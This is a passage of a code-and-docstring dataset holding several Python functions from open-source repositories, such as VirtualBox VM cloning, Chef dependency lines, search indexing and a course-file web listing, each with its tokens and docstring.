[ "def", "vb_clone_vm", "(", "name", "=", "None", ",", "clone_from", "=", "None", ",", "clone_mode", "=", "0", ",", "timeout", "=", "10000", ",", "*", "*", "kwargs", ")", ":", "vbox", "=", "vb_get_box", "(", ")", "log", ".", "info", "(", "'Clone virtualbox machine %s from %s'", ",", "name", ",", "clone_from", ")", "source_machine", "=", "vbox", ".", "findMachine", "(", "clone_from", ")", "groups", "=", "None", "os_type_id", "=", "'Other'", "new_machine", "=", "vbox", ".", "createMachine", "(", "None", ",", "# Settings file", "name", ",", "groups", ",", "os_type_id", ",", "None", "# flags", ")", "progress", "=", "source_machine", ".", "cloneTo", "(", "new_machine", ",", "clone_mode", ",", "# CloneMode", "None", "# CloneOptions : None = Full?", ")", "progress", ".", "waitForCompletion", "(", "timeout", ")", "log", ".", "info", "(", "'Finished cloning %s from %s'", ",", "name", ",", "clone_from", ")", "vbox", ".", "registerMachine", "(", "new_machine", ")", "return", "vb_xpcom_to_attribute_dict", "(", "new_machine", ",", "'IMachine'", ")" ]
Tells virtualbox to create a VM by cloning from an existing one @param name: Name for the new VM @type name: str @param clone_from: @type clone_from: str @param timeout: maximum time in milliseconds to wait or -1 to wait indefinitely @type timeout: int @return dict of resulting VM
[ "Tells", "virtualbox", "to", "create", "a", "VM", "by", "cloning", "from", "an", "existing", "one" ]
python
train
zhammer/faaspact-verifier
faaspact_verifier/entities/emulator.py
https://github.com/zhammer/faaspact-verifier/blob/f2b7accb869bcadbe4aecbce1ca8e89d47843b44/faaspact_verifier/entities/emulator.py#L94-L102
def _use_provider_states( provider_state_fixtures_with_params: List[Tuple[ProviderStateFixture, Dict]] ) -> Generator: """Run all given provider states as a contextmanager.""" with contextlib.ExitStack() as stack: for provider_state_fixture, params in provider_state_fixtures_with_params: stack.enter_context(provider_state_fixture(**params)) yield
[ "def", "_use_provider_states", "(", "provider_state_fixtures_with_params", ":", "List", "[", "Tuple", "[", "ProviderStateFixture", ",", "Dict", "]", "]", ")", "->", "Generator", ":", "with", "contextlib", ".", "ExitStack", "(", ")", "as", "stack", ":", "for", "provider_state_fixture", ",", "params", "in", "provider_state_fixtures_with_params", ":", "stack", ".", "enter_context", "(", "provider_state_fixture", "(", "*", "*", "params", ")", ")", "yield" ]
Run all given provider states as a contextmanager.
[ "Run", "all", "given", "provider", "states", "as", "a", "contextmanager", "." ]
python
train
rackerlabs/fastfood
fastfood/book.py
https://github.com/rackerlabs/fastfood/blob/543970c4cedbb3956e84a7986469fdd7e4ee8fc8/fastfood/book.py#L97-L107
def depends_statement(cookbook_name, metadata=None): """Return a valid Ruby 'depends' statement for the metadata.rb file.""" line = "depends '%s'" % cookbook_name if metadata: if not isinstance(metadata, dict): raise TypeError("Stencil dependency options for %s " "should be a dict of options, not %s." % (cookbook_name, metadata)) if metadata: line = "%s '%s'" % (line, "', '".join(metadata)) return line
[ "def", "depends_statement", "(", "cookbook_name", ",", "metadata", "=", "None", ")", ":", "line", "=", "\"depends '%s'\"", "%", "cookbook_name", "if", "metadata", ":", "if", "not", "isinstance", "(", "metadata", ",", "dict", ")", ":", "raise", "TypeError", "(", "\"Stencil dependency options for %s \"", "\"should be a dict of options, not %s.\"", "%", "(", "cookbook_name", ",", "metadata", ")", ")", "if", "metadata", ":", "line", "=", "\"%s '%s'\"", "%", "(", "line", ",", "\"', '\"", ".", "join", "(", "metadata", ")", ")", "return", "line" ]
Return a valid Ruby 'depends' statement for the metadata.rb file.
[ "Return", "a", "valid", "Ruby", "depends", "statement", "for", "the", "metadata", ".", "rb", "file", "." ]
python
train
cga-harvard/Hypermap-Registry
hypermap/aggregator/tasks.py
https://github.com/cga-harvard/Hypermap-Registry/blob/899a5385b15af7fba190ab4fae1d41e47d155a1b/hypermap/aggregator/tasks.py#L209-L228
def index_service(self, service_id): """ Index a service in search engine. """ from hypermap.aggregator.models import Service service = Service.objects.get(id=service_id) if not service.is_valid: LOGGER.debug('Not indexing service with id %s in search engine as it is not valid' % service.id) return LOGGER.debug('Indexing service %s' % service.id) layer_to_process = service.layer_set.all() for layer in layer_to_process: if not settings.REGISTRY_SKIP_CELERY: index_layer(layer.id, use_cache=True) else: index_layer(layer.id)
[ "def", "index_service", "(", "self", ",", "service_id", ")", ":", "from", "hypermap", ".", "aggregator", ".", "models", "import", "Service", "service", "=", "Service", ".", "objects", ".", "get", "(", "id", "=", "service_id", ")", "if", "not", "service", ".", "is_valid", ":", "LOGGER", ".", "debug", "(", "'Not indexing service with id %s in search engine as it is not valid'", "%", "service", ".", "id", ")", "return", "LOGGER", ".", "debug", "(", "'Indexing service %s'", "%", "service", ".", "id", ")", "layer_to_process", "=", "service", ".", "layer_set", ".", "all", "(", ")", "for", "layer", "in", "layer_to_process", ":", "if", "not", "settings", ".", "REGISTRY_SKIP_CELERY", ":", "index_layer", "(", "layer", ".", "id", ",", "use_cache", "=", "True", ")", "else", ":", "index_layer", "(", "layer", ".", "id", ")" ]
Index a service in search engine.
[ "Index", "a", "service", "in", "search", "engine", "." ]
python
train
inasafe/inasafe
safe/plugin.py
https://github.com/inasafe/inasafe/blob/831d60abba919f6d481dc94a8d988cc205130724/safe/plugin.py#L464-L477
def _create_analysis_extent_action(self): """Create action for analysis extent dialog.""" icon = resources_path('img', 'icons', 'set-extents-tool.svg') self.action_extent_selector = QAction( QIcon(icon), self.tr('Set Analysis Area'), self.iface.mainWindow()) self.action_extent_selector.setStatusTip(self.tr( 'Set the analysis area for InaSAFE')) self.action_extent_selector.setWhatsThis(self.tr( 'Set the analysis area for InaSAFE')) self.action_extent_selector.triggered.connect( self.show_extent_selector) self.add_action(self.action_extent_selector)
[ "def", "_create_analysis_extent_action", "(", "self", ")", ":", "icon", "=", "resources_path", "(", "'img'", ",", "'icons'", ",", "'set-extents-tool.svg'", ")", "self", ".", "action_extent_selector", "=", "QAction", "(", "QIcon", "(", "icon", ")", ",", "self", ".", "tr", "(", "'Set Analysis Area'", ")", ",", "self", ".", "iface", ".", "mainWindow", "(", ")", ")", "self", ".", "action_extent_selector", ".", "setStatusTip", "(", "self", ".", "tr", "(", "'Set the analysis area for InaSAFE'", ")", ")", "self", ".", "action_extent_selector", ".", "setWhatsThis", "(", "self", ".", "tr", "(", "'Set the analysis area for InaSAFE'", ")", ")", "self", ".", "action_extent_selector", ".", "triggered", ".", "connect", "(", "self", ".", "show_extent_selector", ")", "self", ".", "add_action", "(", "self", ".", "action_extent_selector", ")" ]
Create action for analysis extent dialog.
[ "Create", "action", "for", "analysis", "extent", "dialog", "." ]
python
train
mitsei/dlkit
dlkit/services/logging_.py
https://github.com/mitsei/dlkit/blob/445f968a175d61c8d92c0f617a3c17dc1dc7c584/dlkit/services/logging_.py#L1080-L1088
def use_comparative_log_entry_view(self): """Pass through to provider LogEntryLookupSession.use_comparative_log_entry_view""" self._object_views['log_entry'] = COMPARATIVE # self._get_provider_session('log_entry_lookup_session') # To make sure the session is tracked for session in self._get_provider_sessions(): try: session.use_comparative_log_entry_view() except AttributeError: pass
[ "def", "use_comparative_log_entry_view", "(", "self", ")", ":", "self", ".", "_object_views", "[", "'log_entry'", "]", "=", "COMPARATIVE", "# self._get_provider_session('log_entry_lookup_session') # To make sure the session is tracked", "for", "session", "in", "self", ".", "_get_provider_sessions", "(", ")", ":", "try", ":", "session", ".", "use_comparative_log_entry_view", "(", ")", "except", "AttributeError", ":", "pass" ]
Pass through to provider LogEntryLookupSession.use_comparative_log_entry_view
[ "Pass", "through", "to", "provider", "LogEntryLookupSession", ".", "use_comparative_log_entry_view" ]
python
train
jeffh/rpi_courses
rpi_courses/web.py
https://github.com/jeffh/rpi_courses/blob/c97176f73f866f112c785910ebf3ff8a790e8e9a/rpi_courses/web.py#L61-L74
def list_rocs_files(url=ROCS_URL): """Gets the contents of the given url. """ soup = BeautifulSoup(get(url)) if not url.endswith('/'): url += '/' files = [] for elem in soup.findAll('a'): if elem['href'].startswith('?'): continue if elem.string.lower() == 'parent directory': continue files.append(url + elem['href']) return files
[ "def", "list_rocs_files", "(", "url", "=", "ROCS_URL", ")", ":", "soup", "=", "BeautifulSoup", "(", "get", "(", "url", ")", ")", "if", "not", "url", ".", "endswith", "(", "'/'", ")", ":", "url", "+=", "'/'", "files", "=", "[", "]", "for", "elem", "in", "soup", ".", "findAll", "(", "'a'", ")", ":", "if", "elem", "[", "'href'", "]", ".", "startswith", "(", "'?'", ")", ":", "continue", "if", "elem", ".", "string", ".", "lower", "(", ")", "==", "'parent directory'", ":", "continue", "files", ".", "append", "(", "url", "+", "elem", "[", "'href'", "]", ")", "return", "files" ]
Gets the contents of the given url.
[ "Gets", "the", "contents", "of", "the", "given", "url", "." ]
python
train
haikuginger/beekeeper
beekeeper/variables.py
https://github.com/haikuginger/beekeeper/blob/b647d3add0b407ec5dc3a2a39c4f6dac31243b18/beekeeper/variables.py#L191-L196
def vals(self, var_type): """ Create a dictionary with name/value pairs listing the variables of a particular type that have a value. """ return {x: y for x, y in self.items() if y.has_value_of_type(var_type)}
[ "def", "vals", "(", "self", ",", "var_type", ")", ":", "return", "{", "x", ":", "y", "for", "x", ",", "y", "in", "self", ".", "items", "(", ")", "if", "y", ".", "has_value_of_type", "(", "var_type", ")", "}" ]
Create a dictionary with name/value pairs listing the variables of a particular type that have a value.
[ "Create", "a", "dictionary", "with", "name", "/", "value", "pairs", "listing", "the", "variables", "of", "a", "particular", "type", "that", "have", "a", "value", "." ]
python
train